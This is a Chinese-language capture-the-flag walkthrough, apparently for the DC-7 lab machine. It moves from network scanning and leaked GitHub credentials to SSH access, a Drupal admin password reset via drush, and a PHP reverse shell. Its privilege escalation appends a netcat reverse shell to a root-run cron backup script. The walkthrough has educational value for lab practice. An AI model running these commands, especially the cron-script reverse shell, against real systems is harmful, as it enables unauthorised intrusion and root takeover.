信息收集

确定IP地址

netdiscover -i eth0 -r 192.168.84.0/24

扫描端口

nmap 漏洞扫描

WEB测试

基于网站的信息收集

最终在github上面发现代码泄露

https://github.com/Dc7User/staffdb

在config.php文件中发现账户与密码

经测试，可登录ssh

在当前目录下有一个mbox文件

调用了这个脚本

查看当前目录下的文件，backups里面有两个加密文件，不可利用，查看mbox文件，发现是一个计划任务 自动备份数据库的执行情况，调用的脚本是/opt/scripts/backups.sh，是root权限执行的

注意：drush是专门用来管理Drupal站点的shell，可以用来修改密码

故修改站点密码

先进入网站所在的目录

通过以下命令发现管理员账号admin

drush user-information admin

修改admin账户的密码

drush upwd admin --password="passwd"

以当前的账户密码登录网站后台

写入反弹shell

该位置可以编写文章，但是没有php形式

安装支持php语言的插件

插件链接：https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

安装成功

提示：如果报错，则重新安装即可

回到模块中，勾选php安装，安装完成后在内容编辑的地方出现了PHP code

在该页面写入反弹shell【网上随便找下即可】

本地开启监听状态

提权

获取标准的终端

python -c "import pty;pty.spawn('/bin/bash')"

利用定时任务提权

追加一个反弹shell到定时任务中，即可

echo "nc -e /bin/bash 192.168.84.174 5555" >> /opt/scripts/backups.sh

本地监听5555端口，等待backups.sh文件定时执行root权限就好了

获取标准的终端

python -c "import pty;pty.spawn('/bin/bash')"

flag